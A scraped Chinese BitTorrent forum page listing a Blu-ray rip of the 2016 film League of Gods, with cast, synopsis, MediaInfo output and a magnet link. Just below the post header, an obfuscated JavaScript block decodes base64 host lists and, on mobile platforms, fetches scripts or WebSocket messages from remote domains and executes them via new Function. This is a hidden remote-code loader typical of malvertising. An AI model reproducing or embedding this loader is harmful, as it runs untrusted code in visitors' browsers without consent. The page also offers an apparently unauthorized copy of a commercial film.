封神传奇[国语配音/粤语配音].League.of.Gods.2016.1080p.BluRay.x265.10bit.DTS.2Audio 5.52GB

版主小s 1月前 273

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 封神传奇 / 封神榜 / 3D封神榜 / 封神传奇之雷震子 / League of Gods
◎年  代 2016
◎产  地 中国香港 / 中国大陆
◎类  别 剧情 / 动作 / 奇幻
◎语  言 汉语普通话
◎上映日期 2016-07-29(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt5481184/
◎豆瓣评分 2.9/10 (58261人评价)
◎豆瓣链接 https://movie.douban.com/subject/25850122/
◎片  长 109分钟
◎导  演 许安 Koan Hui (id:1287130)
◎编  剧 张炭 Cheung Tan (id:1313457)
       张志光 Chi-Kwong Cheung (id:1313458)
       孙子荣 Samson Sun (id:1360176)
       蔡衍泽 Yanze Cai (id:1357481)
       许仲琳 Zhonglin Xu (id:1345660)
◎演  员 李连杰 Jet Li (id:1025146)
       范冰冰 Bingbing Fan (id:1050059)
       黄晓明 Xiaoming Huang (id:1041404)
       杨颖 Angelababy (id:1033011)
       古天乐 Louis Koo (id:1027577)
       文章 Zhang Wen (id:1011513)
       向佐 Jacky Heung (id:1275971)
       梁家辉 Tony Leung (id:1118167)
       祖峰 Feng Zu (id:1313650)
       安志杰 Andy On (id:1045364)
       许晴 Qing Xu (id:1005268)
       陈小春 Jordan Chan (id:1075760)
       王璨 cancan (id:1428136)
       李庆誉 Qingyu Li (id:1408302)
       吴屹桐 Yitong Wu (id:1351475)
       郝社永 Sheyong Hao (id:1423106)
       向华强 Charles Heung (id:1037691)
       叶伟信 Wilson Yip (id:1274472)
       约翰·戴布尼 John Debney (id:1025369)
       黄岳泰 Arthur Wong (id:1301185)
       李栋全 Wenders Li (id:1275162)
       张叔平 William Chang (id:1274369)
       扎克·贾德森 Zack Judson (id:1411059)
       马小瑞 Xiaorui Ma (id:1409233)
       谷文泽 Wenze Gu (id:1374611)
       胡顺儿 Shuner Hu (id:1355421)

◎标  签 神话 / 奇幻 / 2016 / 中国大陆 / 动作 / 香港 / 搞笑 / 3D

◎简  介
  三千年前,商末,昏君纣王(梁家辉 饰)受妖妃妲己(范冰冰 饰)蛊惑,联手申公豹(古天乐 饰),试图召唤黑暗力量降生灭世黑龙,一时间妖孽横行,民不聊生……为阻止昏君灭世,姜子牙(李连杰 饰)命雷震子(向佐 饰)、哪吒(文章 饰)与杨戬(黄晓明 饰)联手寻找光明之剑斩妖除魔,并协助武王引领西岐大军攻打朝歌。不料妲己施法令姜子牙中了逆生咒,朝歌大战迫在眉睫,黑龙降世已成定局,天下再度陷入危机……

◎获奖情况 (共2项)
  第36届香港电影金像奖 (2017)
  最佳服装造型设计(提名)

  第8届金扫帚奖 (2017)
  最令人失望影片

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 253949472577108863827409709521838143109 (0xBF0CE3AD14CB36A99BC76D59BFADF685)

  4. Complete name                            : [email protected]DDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.52 GiB

  8. Duration                                 : 1 h 48 min

  9. Overall bit rate                         : 7 251 kb/s

  10. Encoded date                             : UTC 2021-08-21 12:20:58

  11. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 48 min

  20. Bit rate                                 : 4 186 kb/s

  21. Width                                    : 1 920 pixels

  22. Height                                   : 804 pixels

  23. Display aspect ratio                     : 2.40:1

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 24.000 FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 10 bits

  29. Bits/(Pixel*Frame)                       : 0.113

  30. Stream size                              : 3.19 GiB (58%)

  31. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings                        : rc=crf / crf=22.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x804 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Language                                 : Chinese

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio #1

  37. ID                                       : 2

  38. ID in the original source medium         : 4352 (0x1100)

  39. Format                                   : DTS

  40. Format/Info                              : Digital Theater Systems

  41. Codec ID                                 : A_DTS

  42. Duration                                 : 1 h 48 min

  43. Bit rate mode                            : Constant

  44. Bit rate                                 : 1 509 kb/s

  45. Channel(s)                               : 6 channels

  46. Channel layout                           : C L R Ls Rs LFE

  47. Sampling rate                            : 48.0 kHz

  48. Frame rate                               : 93.750 FPS (512 SPF)

  49. Bit depth                                : 24 bits

  50. Compression mode                         : Lossy

  51. Stream size                              : 1.15 GiB (21%)

  52. Title                                    : Mandarin

  53. Language                                 : Chinese

  54. Default                                  : Yes

  55. Forced                                   : No

  56. Original source medium                   : Blu-ray


  57. Audio #2

  58. ID                                       : 3

  59. Format                                   : DTS

  60. Format/Info                              : Digital Theater Systems

  61. Codec ID                                 : A_DTS

  62. Duration                                 : 1 h 48 min

  63. Bit rate mode                            : Constant

  64. Bit rate                                 : 1 510 kb/s

  65. Channel(s)                               : 6 channels

  66. Channel layout                           : C L R Ls Rs LFE

  67. Sampling rate                            : 48.0 kHz

  68. Frame rate                               : 93.750 FPS (512 SPF)

  69. Bit depth                                : 24 bits

  70. Compression mode                         : Lossy

  71. Stream size                              : 1.15 GiB (21%)

  72. Title                                    : Cantonese

  73. Language                                 : Chinese

  74. Default                                  : No

  75. Forced                                   : No


  76. Text #1

  77. ID                                       : 4

  78. ID in the original source medium         : 4608 (0x1200)

  79. Format                                   : PGS

  80. Muxing mode                              : zlib

  81. Codec ID                                 : S_HDMV/PGS

  82. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  83. Duration                                 : 1 h 39 min

  84. Bit rate                                 : 25.6 kb/s

  85. Count of elements                        : 2264

  86. Stream size                              : 18.1 MiB (0%)

  87. Title                                    : cht(Mandarin)

  88. Language                                 : Chinese

  89. Default                                  : Yes

  90. Forced                                   : No

  91. Original source medium                   : Blu-ray


  92. Text #2

  93. ID                                       : 5

  94. ID in the original source medium         : 4609 (0x1201)

  95. Format                                   : PGS

  96. Muxing mode                              : zlib

  97. Codec ID                                 : S_HDMV/PGS

  98. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration                                 : 1 h 39 min

  100. Bit rate                                 : 25.7 kb/s

  101. Count of elements                        : 2300

  102. Stream size                              : 18.2 MiB (0%)

  103. Title                                    : cht(Cantonese)

  104. Language                                 : Chinese

  105. Default                                  : No

  106. Forced                                   : No

  107. Original source medium                   : Blu-ray


  108. Text #3

  109. ID                                       : 6

  110. ID in the original source medium         : 4610 (0x1202)

  111. Format                                   : PGS

  112. Muxing mode                              : zlib

  113. Codec ID                                 : S_HDMV/PGS

  114. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  115. Duration                                 : 1 h 39 min

  116. Bit rate                                 : 30.9 kb/s

  117. Count of elements                        : 2264

  118. Stream size                              : 21.9 MiB (0%)

  119. Title                                    : eng

  120. Language                                 : English

  121. Default                                  : No

  122. Forced                                   : No

  123. Original source medium                   : Blu-ray


  124. Menu

  125. 00:00:00.000                             : 第 01 章

  126. 00:10:20.416                             : 第 02 章

  127. 00:23:55.166                             : 第 03 章

  128. 00:36:19.083                             : 第 04 章

  129. 00:45:13.250                             : 第 05 章

  130. 00:53:14.958                             : 第 06 章

  131. 01:06:52.500                             : 第 07 章

  132. 01:16:07.416                             : 第 08 章

  133. 01:26:13.291                             : 第 09 章

  134. 01:34:56.583                             : 第 10 章



TAGS 动作 奇幻 剧情

磁力链:
  • magnet:?xt=urn:btih:9F14714F6B6690FBE942A2ABFDFE49AC0F91B61A
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回